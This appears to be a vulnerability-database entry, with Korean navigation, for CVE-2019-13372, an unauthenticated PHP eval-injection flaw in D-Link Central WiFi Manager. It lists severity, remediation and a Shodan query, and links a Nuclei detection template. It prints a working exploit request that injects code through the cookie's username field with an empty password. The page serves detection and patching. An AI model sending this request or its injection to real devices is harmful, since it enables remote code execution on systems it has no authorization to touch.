🔙 목록으로 돌아가기

CVE-2019-13372: D-Link Central WiFi Manager CWM(100) - Remote Code Execution

TitleD-Link Central WiFi Manager CWM(100) - Remote Code Execution
AuthorDhiyaneshDK
SeverityCritical
ImpactUnauthenticated attackers can execute arbitrary PHP code via cookie manipulation, leading to complete compromise of the D-Link Central WiFi Manager and potential access to all managed WiFi networks.
RemediationUpdate D-Link Central WiFi Manager to version 1.03R0100_BETA6 or later.
CVSS Score9.8
EPSS Score0.93075
CVE IDCVE-2019-13372
CWE IDCWE-94
Shodan Queryhtml:"D-Link Central WiFiManager"
Tags cve cve2019 d-link wifimanager vkev vuln

🔍 Vulnerability Description

/web/Lib/Action/IndexAction.class.php in D-Link Central WiFi Manager CWM(100) before v1.03R0100_BETA6 allows remote attackers to execute arbitrary PHP code via a cookie because a cookie’s username field allows eval injection, and an empty password bypasses authentication.

🌐 HTTP Request

GET /index.php/Index/index HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0
Connection: close
Cookie: username=',0,"",1,"0")%3becho%20"JPbHBEVqxd"%3b//";password=
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-13372.yaml

🦈 Packet Capture: ⬇️ Download cve-2019-13372.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A